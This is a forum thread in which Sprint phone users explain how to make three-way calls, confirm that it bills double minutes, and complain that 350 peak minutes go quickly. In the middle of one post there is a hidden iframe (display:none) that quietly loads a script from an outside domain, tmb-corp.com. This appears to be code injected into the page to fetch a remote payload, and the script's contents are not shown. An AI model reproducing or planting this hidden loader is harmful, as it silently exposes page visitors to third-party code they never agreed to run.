    3-Way Calling

For those of you who are not aware, to do a 3-way call, you dial the first person, wait until they answer, press Talk, dial the second person, wait till they answer, then press Talk again to connect everyone together.

Pretty handy. We use it to make calls to the family where the wife and I both want to converse. I dial my home number first (the wife), then the other party. Sort of free long-distance from the home phone. I even sometime pick up another home extension, just so I don't have to fry my brain as much .

Anyways, I have a question for longer-time Sprint users: does this burn up double the minutes? On the weekends, I don't care, but I do a bit for weekday peak calls.

    Unlike Marctronixx , I only have 350 peak minutes.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Yes, this will use up double the minutes, as will using call waiting, put a call on hold and pick up the second, you are billing at 2 minutes per minute. Still, they are very handy features to have.

I have found that 350 minutes for on peak is not a lot. Even if you are a moderate user of your phone you will find that you will burn those minutes up in no time. It took one huge phone bill for me to learn that lesson the hard way.

    right!

you are chareg by the minute.. so if your call ends at 4.07 you will be charged 5minutes!

those minutes will be gone in a shot!!
